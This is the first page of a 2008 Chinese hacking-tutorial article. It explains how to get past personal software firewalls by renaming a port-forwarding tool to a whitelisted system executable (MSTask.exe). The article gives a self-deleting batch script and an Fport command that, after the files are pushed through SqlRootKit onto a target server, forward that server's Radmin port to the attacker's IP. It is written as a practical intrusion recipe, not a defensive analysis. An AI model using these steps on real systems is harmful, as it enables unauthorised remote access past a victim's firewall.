文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络网络技术黑客技术找出通病 通杀国内软件防火墙
精品推荐
特别推荐
·黑客攻击行为特征分析与反攻击技术
·网络入侵也玩双通道 间接实现入侵系统
·推荐:防止黑客入侵ADSL的一些技巧
·黑客及木马攻击常见端口的关闭
·计算机端口扫描技术全攻略
·windows密码设置及破解详解
·简单方法查找黑客老巢
·一次入侵过程的公开分析
热点TOP10
·谁能知道微软在你的计算机里隐藏的秘密
·DoS攻击简述
·小谈在Linux系统下的IP伪装功能
·玩马日记(菜鸟篇)
·黑客技术(一)
·黑客技术(二)
·迎刃而解——常用密码破解完全手册
·二宗罪:一定要放毒进来?

找出通病 通杀国内软件防火墙

日期:2008年3月9日 作者: 查看:[大字体 中字体 小字体]

一直以来都有一个梦想:要是能发现些漏洞或BUG什么的该多好啊!于是整天对着电脑瞎弄瞎研究,研究什么呢?研究如何突破防火墙(偶这里指的防火墙是软体型的个人防火墙,硬件的偶也没条件。)嘿嘿,你还别说,还真没白研究,还真给偶发现了大多数防火墙的通病。这个BUG能让我们欺骗防火墙来达到访外的目的,具体情况是怎么样的呢?请看下面的解说!

首先,我要介绍一下Windows系统特性,当一个程序运行时,它不能删除,但却能够改名!而当系统里的被保护程序遭到删除或损坏或改名时系统就会及时调用备份文件给予还原!我再讲讲防火墙,大家都知道许多防火墙的“应用程序规则”里一般默认就会让IE浏览器(iexplore.exe)、Outlook Express(msimn.exe)、lsass.exe、spoolsv.exe、MSTask.exe、winlogon.exe、services.exe、svchost.exe通过,而大多的防火墙认为只要是与规则里的路径及文件名相同就Pass!以这样的检测方法来决定是否放行,但它却完全没考虑到如果是别的文件替换的呢?——就相当于古装片里的易容术,易容后就认不得了!这就给了我们机会,我们可以利用这个BUG来欺骗防火墙来达到访外的目的!

小知识:其实现在大多木马采用的DLL插线程技术也就是利用了这个原理,它们首先隐蔽的开启一个认证放行的程序进程(如Iexplore.exe进程),接着把DLL型木马插入这个线程内,然后访外时就可轻松突破防火墙的限制了——因为防火墙是不会拦截已认证放行的程序的。

原理讲完了,我们现在讲讲该如何利用这个BUG了!这里我用虚拟机做实验,制造如下条件:

为了更符合现实,我给服务器安装了“天网防火墙”、Radmin(但由于防火墙指定了访问IP地址,所以没办法正常连接!),MSSQL SERVER、Serv-u。首先我们用常用的方法进行端口转发,看看防火墙有什么反应!

第一步,启用AngelShell Ver 1.0里的Fport(用来进行端口转发的服务端,几乎可以转发任何端口),然后在本地用FportClient(用来进行端口转发的客户端)监听好!

第二步,直接在CMDSHELL里运行“e:\www\fport.exe 4899 192.168.1.1 7788”,这时我们看到虚拟机里的“天网”对Fport马上进行了拦截。

看到了吧!由于Fport并不是认证放行的,防火墙马上就进行了拦截!OK,现在我们实行欺骗计划,看偶如何突破防火墙的!还是执行第一步,然后新建一个批处理,内容如下:

ren MSTask.exe MSTask1.exe

ren fport.exe MSTask.exe

MSTask.exe 4899 192.168.1.1 7788

Del %0

命名为go.bat,接着用SqlRootKit把“Fport.exe”和go.bat 一起copy到目标机子的c:\winnt\system32\(也就是MSTask所在的目录)在SqlRootKit里执行go.bat(注意如果要改MSTask.exe的名的话就需要有管理员权限)。

当FportClient出现“已经接受到远程计算机的连接!”时,用Radmin客户端连接本机的4899端口。

我们已经成功突破限制(由于防火墙没有限制本地连接4899端口,我们用Fport转发了它的端口,登录时等于本地连接,因此我们能够成功连接),这样一来,我们本不能逃过防火墙的Fport便变成了一个有“插线程”技术的端口转发工具了!

据我实验,国内的防火墙几乎无一例外的“拥有”这个BUG!虽然这个BUG不会带来什么大的危害,但总是给入侵者多了一个黑我们的机会!


[1] [2] 下一页 



上一篇:用修改文件时间的方法来加密文件

下一篇:借刀杀人:用工具破解Foxmail密码
相关文章:
·怎样卸载和删除QQ非法外挂软件的提示
·酷我音乐盒 桌面歌词的好软件
·大智慧股票软件Level-2入门手册
·梦幻科技推出国内首款Flash转VCD/DVD工具
·3gp转换为avi格式的软件
·专业光碟烧录软件Nero 8.3.2.1
·更上一层楼!瑞星杀毒软件2008版评测
相关软件:
·优秀企业网站系统软件源码免费版V2009
·诺顿杀毒软件+诺顿防火墙免费破解版免注册永远自动升级
·诺顿杀毒软件+诺顿防火墙免费破解版 免注册
·智能3D彩票软件v4.3
·Nero 7 中文破解版 EXE 经典光盘刻软件,应求见查看
·KTV声控录音软件 V2.0
·全国监理工程师执业资格考试全真冲刺模拟试题软件

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot